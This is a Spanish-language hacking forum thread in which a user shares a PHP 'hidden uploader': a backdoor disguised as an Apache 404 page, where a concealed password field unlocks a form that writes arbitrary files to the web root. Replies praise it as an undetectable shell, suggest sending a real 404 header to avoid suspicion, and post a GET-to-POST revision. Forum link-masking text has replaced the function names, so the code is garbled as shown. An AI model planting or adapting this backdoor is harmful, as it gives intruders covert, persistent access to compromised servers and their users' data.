comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Uploader oculto

  • 5 Respuestas
  • 2092 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado Decode

  • *
  • Underc0der
  • Mensajes: 38
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« en: Agosto 26, 2014, 09:39:18 pm »
Hola gente,aquí les dejo un uploader oculto:

Código: PHP
  1. <title>404 Not Found</title>
  2. <h1>Not Found</h1>
  3. <p>The requested URL was not found on this server.</p>
  4. <hr>
  5. <address>Apache Server at <?php echo $_SERVER['SERVER_NAME']; ?> Port 80</address>
  6.     <style>
  7.         input { margin:0;background-color:#fff;border:1px solid #fff; }
  8.     </style>
  9.     <center>
  10.     <form method="post"><p>
  11. <center><input type="password" name="pw" size="25" value=""></center>
  12. </form></p></center>
  13. <?php
  14. if(You are not allowed to view links. Register or Login($_POST["pw"])==0){if(You are not allowed to view links. Register or Login($_POST["pw"])=="76ee3de97a1b8b903319b7c013d8c877"){if(You are not allowed to view links. Register or Login($_FILES["A"])==0){
  15. if(You are not allowed to view links. Register or Login($_FILES['A']['tmp_name'],$_SERVER["DOCUMENT_ROOT"].'/'.$_FILES['A']['name'])==1){echo "<center>Archivo subido!</center>";}
  16. }else{echo '<form enctype="multipart/form-data" action="'.$_SERVER["REQUEST_URI"].'" method="POST"><center><input name="A" type="file"><input type="submit" value="Subir"></center></form>';}You are not allowed to view links. Register or Login();}}
  17. ?>

Password: upload

Saludos.
« Última modificación: Julio 17, 2018, 05:31:44 pm por Decode »

Desconectado 0b3Y

  • *
  • Underc0der
  • Mensajes: 12
  • Actividad:
    0%
  • Reputación 0
  • The World Is MINE!
    • Ver Perfil
« Respuesta #1 en: Agosto 27, 2014, 02:47:37 pm »
Genial!, me encanta este tipo de shells, totalmente ocultas :D. Unicamente... podrias hacer que no apareciera la password en la url??

Desconectado BigBear

  • *
  • Underc0der
  • Mensajes: 543
  • Actividad:
    0%
  • Reputación 3
    • Ver Perfil
« Respuesta #2 en: Agosto 27, 2014, 03:38:13 pm »
yo tambien uso lo mismo para mis tools en php.

Desconectado fermino

  • *
  • Underc0der
  • Mensajes: 330
  • Actividad:
    0%
  • Reputación 1
  • Aprendiz de todo, maestro de nada...
    • Ver Perfil
    • In The Middle Of Knowledge
« Respuesta #3 en: Agosto 28, 2014, 04:59:09 pm »
Buenísimo! Lo uníco que agregaría es un header() con el 404 para que cualquiera que ande con una extensión que le permita ver las headers no sospeche...
Visita mi blog: You are not allowed to view links. Register or Login.

Desconectado Jimeno

  • *
  • Underc0der
  • Mensajes: 367
  • Actividad:
    0%
  • Reputación -1
  • NULL
    • Ver Perfil
    • Twitter
  • Skype: migueljimeno96
  • Twitter: &quot;&gt;&lt;&lt;img src=y onerror=prompt();&gt;
« Respuesta #4 en: Agosto 30, 2014, 03:22:52 pm »
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login
Genial!, me encanta este tipo de shells, totalmente ocultas :D. Unicamente... podrias hacer que no apareciera la password en la url??

Lamentablemente la contraseña saldrá en la URL siempre.

Saludos.


Si envías la pass por el método POST no aparecerá en la URL.
Contacto: @migueljimeno96 -

Conectado blackdrake

  • *
  • Co Admin
  • Mensajes: 1893
  • Actividad:
    16.67%
  • Reputación 14
    • Ver Perfil
« Respuesta #5 en: Agosto 30, 2014, 03:56:43 pm »
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login
Genial!, me encanta este tipo de shells, totalmente ocultas :D. Unicamente... podrias hacer que no apareciera la password en la url??

Lamentablemente la contraseña saldrá en la URL siempre.

Saludos.


Si envías la pass por el método POST no aparecerá en la URL.

Para los que no saben, habría que editar las siguientes lineas por estas:

Código: PHP
  1.  <form><p>
  2. <center><input type="password" name="pw" size="25" value=""></center>
  3. </form></p></center>
  4. <?php
  5. if(You are not allowed to view links. Register or Login($_GET["pw"])==0){if(You are not allowed to view links. Register or Login($_GET["pw"])=="202cb962ac59075b964b07152d234b70")

Por:

Código: PHP
  1.  <form method="post"><p>
  2. <center><input type="password" name="pw" size="25" value=""></center>
  3. </form></p></center>
  4. <?php
  5. if(You are not allowed to view links. Register or Login($_POST["pw"])==0){if(You are not allowed to view links. Register or Login($_POST["pw"])=="202cb962ac59075b964b07152d234b70")

Un saludo.



 

¿Te gustó el post? COMPARTILO!